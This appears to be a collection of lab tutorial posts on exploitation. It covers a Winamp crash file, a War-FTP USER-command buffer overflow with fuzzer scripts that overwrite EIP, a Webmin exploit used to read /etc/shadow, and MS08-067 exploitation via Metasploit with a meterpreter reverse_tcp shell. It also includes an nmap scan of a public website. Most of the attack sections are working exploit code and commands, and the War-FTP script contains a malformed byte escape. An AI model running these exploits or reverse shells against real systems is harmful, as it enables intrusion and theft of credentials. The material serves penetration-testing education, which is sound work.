Local Buffer Overflow : Winamp v5.572

I try to make Winamp 5.572 running on Windows XP SP3 crash. First, I will send a music file to be run by winamp. To make this file, I search in exploit-db.

I would choose /windows/dos/12494.pl

root@bt:~# cp /pentest/exploits/exploitdb/platforms//windows/dos/12494.pl /root
root@bt:~# mv 12494.pl wincrash.pl

Change line 1 with this :

#!/usr/bin/perl

And then execute this file :

root@bt:~# perl wincrash.pl


then there is a file X.swf

Send to Windows XP and play by winamp, and see what happens..

when viewed with OllyDbg

Thanks...^_^

Software Exploitation Part 1

In this tutorial, I will try to explain the basics of software exploitation. On this occasion, I will give an example of a simple application that runs on Windows operating systems, called war-FTP. War-FTP is an FTP server application that runs on Windows and is an application that does not have protection against buffer overflow (non SEH). Ok, now what is a buffer overflow?, and what is a SEH ?



Buffer Overflow

Buffer overflow occurs when a buffer overflow happens when an application receives a bigger chunk of data than it is expecting, with the result that the data doesn't fit into the allocated storage space, or buffer. The reason that buffer overflow errors are so common is that human programmers make errors: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data that a user enters falls within the expected range.


SEH

An exception is an event that occurs during the execution of a program, and requires the
execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft

Lets Begin !!

Host    : Backtrack 5 R2 (IP address : 192.168.1.1)

Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)

Target apps : War-FTP on win XP (port 21)

Information gathering

from Nessus :

Description from Nessus (select as shown figure above)

The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands.  A potential intruder could use this vulnerability to crash the server  as well as run arbitrary commands on the system.

After this, we can fuzzing with simple fuzzer. We will try to send data 'A' as much as 1000 to war-FTP application by this fuzzer.

#!/usr/bin/python

#file : myfuzzer.py

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x41" * 1000
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

we can run a fuzzer is as follows :

Wow...war-FTP application immediately closed. in this case, war-FTP crashes caused by fuzzer. 

Ok, after this, if we can't run a War-FTP. Therefore, we have to delete FtpDaemon.dat in our War-FTP folder.

Debugger

Now, we want to know what happens in memory system of War-FTP. In this case, we will use debugger in Windows XP, Ollydbg.
Please runs War-FTP under Ollydbg and than we will fuzzing again.

Ok, we will find out in how many bytes to accumulate EIP register. We will use 2 little program, pattern_create.rb & pattern_offset.rb. The location of the file is /opt/metasploit/apps/pro/msf3/tools/. 


root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt 

We will use pattern in string_pattern.txt as data when we fuzzing. 


 #!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A
b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0
Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3
Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5
Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8
Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9
An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0
Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1
Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3
At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4
Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4
Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5
Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6
Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8
Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1
Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

Fuzzing again....!, then you will see the following war-FTP

  
















Now we will calculate the amount of bytes from the pattern set generated by the application pattern_create.rb. We will use patter_offset.rb

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#

Note :
32714131 is EIP address

q4Aq5Aq  is data ESP


Ok, we will modify our fuzzer as follows :

 #!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"

s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")


Fuzzing again...

Ok, we will modify again our fuzzer as follows :


#!/usr/bin/python

import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
buff+="\x90" * (493-len(buff))
buff+="\xC" * (1000 - len(buff))

s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")

Continued on software exploitation part 2

Advance Information Gathering

http://www.4shared.com/rar/E0grMXa9/advance.html

Basics privilege escalation attack

Hey guys!!]
In this tutorial, I will show you the simple privilege escalation attack on our lab. Therefore, I assume that pwnOS installed in Virtualbox as a target. 
From the terminal, we can scanning the target OS (IP address 192.168.1.101)

From the above, we can see that there are several ports opened, such as port 22 (ssh), port 80 (http), etc.

After that, we can see the detail about a target with Nessus.

Ok, port 10000 (webmin) opened, now we will use exploit-db for exploit this service 

We will try exploit it with /multiple/remote/2017.pl


Just type this file in terminal. 

 








So, will display help on how to use this file. 

Ok, let's try!!. We want to open /etc/shadow in target.

Ok, as we know from that figure, the target have user vmware, obama, osama, yomama.

Thank you !1 :-)

Hacking smb on Microsoft Windows XP SP3 using Metasploit

For the first time, we scanning port the target host (192.168.1.101) using Nmap.

From the above we know that 3 port opened by default on Microsoft Windows XP SP3. We want to break the system (target OS) using metasploit on Backtrack 5 R2.
We now run the msfconsole
1. Application > Backtrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

 















Ok, now we can find any weaknesses of the smb application. Just type :

msf > search smb

From the list, we want to use the ms_08_067_netapi, we can get more the information about that weaknes.

 












 
We want to use it in Metasploit, just type :

msf > use exploit/windows/smb/ms08_067_netapi

After that, we can see and select the payload that will be used.

We will use windows/meterpreter/reverse_tcp. Then, we must set the several parameters, such as set PAYLOAD, set RHOST, set LHOST, and set LPORT.

To ensure that all parameters are correct, we can type show options command.

Now we are going to launch the exploit

Just type exploit

 

Now, from meterpreter we can type shell to gain the shell on Windows XP.

Congratulations...! :)

Basics information gathering using Nmap

Hi, I will show you how to use the Nmap application when I try to scan http://www.is2c-dojo.com. As we know that Nmap is an application used to perform port scannning. In Backtrack you are able to run nmap through terminal or GUI (zenmap). So we will try to find out what services are running on this webiste, so make sure you are connected to the internet. Ok, in Backtrack,  Open Terminal and type the following command: 

root@bt:~# nmap -v -A www.is2c-dojo.com  <press enter>

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-08 04:58 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 04:58
Scanning www.is2c-dojo.com (108.162.199.80) [4 ports]
Completed Ping Scan at 04:58, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:58
Completed Parallel DNS resolution of 1 host. at 04:58, 0.42s elapsed
Initiating SYN Stealth Scan at 04:58
Scanning www.is2c-dojo.com (108.162.199.80) [1000 ports]
Discovered open port 80/tcp on 108.162.199.80
Discovered open port 8080/tcp on 108.162.199.80
SYN Stealth Scan Timing: About 44.30% done; ETC: 04:59 (0:00:39 remaining)
Increasing send delay for 108.162.199.80 from 0 to 5 due to 11 out of 18 dropped probes since last increase.
Increasing send delay for 108.162.199.80 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Completed SYN Stealth Scan at 04:59, 77.32s elapsed (1000 total ports)
Initiating Service scan at 04:59
Scanning 2 services on www.is2c-dojo.com (108.162.199.80)
Completed Service scan at 04:59, 5.00s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against www.is2c-dojo.com (108.162.199.80)
Retrying OS detection (try #2) against www.is2c-dojo.com (108.162.199.80)
NSE: Script scanning 108.162.199.80.
Initiating NSE at 04:59
Completed NSE at 05:01, 84.00s elapsed
Nmap scan report for www.is2c-dojo.com (108.162.199.80)
Host is up (0.091s latency).
Other addresses for www.is2c-dojo.com (not scanned): 108.162.199.180
Not shown: 997 filtered ports
PORT     STATE  SERVICE     VERSION
80/tcp   open   http?
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-methods: No Allow or Public header in OPTIONS response (status code 301)
| http-title: IS2C | Information Security Shinobi Camp
|_Requested resource was http://is2c-dojo.com/
443/tcp  closed https
8080/tcp open   http-proxy?
Aggressive OS guesses: Check Point ZoneAlarm Z100G firewall (97%), Linux 2.6.36 (97%), Check Point UTM-1 Edge X firewall (97%), DD-WRT v23 (Linux 2.4.34) (97%), Linux 2.6.23 (97%), Linux 2.6.32 (97%), Sun Solaris 10 (97%), Sun Solaris 10 (SPARC) (97%), Actiontec GT701 DSL modem (96%), Linux 2.6.31 (96%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.906 days (since Wed Sep  5 07:16:01 2012)
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT      ADDRESS
1   90.56 ms 108.162.199.80

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.81 seconds
           Raw packets sent: 2140 (99.110KB) | Rcvd: 24 (1.266KB)
After, we are done scanning the above we can see that this website has the following information :

• The site has an IP address of 108.162.199.80 
• Open port 80 and 8080, http port.
• Port 443 (https) closed
• This web server is likely to have a Linux operating system and sun solaris.

Ok, from the following information:


No exact OS matches for host (test conditions non-ideal)

we know that Nmap is still not able to detect the OS on a www.is2c-dojo.com.

Ok, thank u and see u soon.

by scx020c07d :)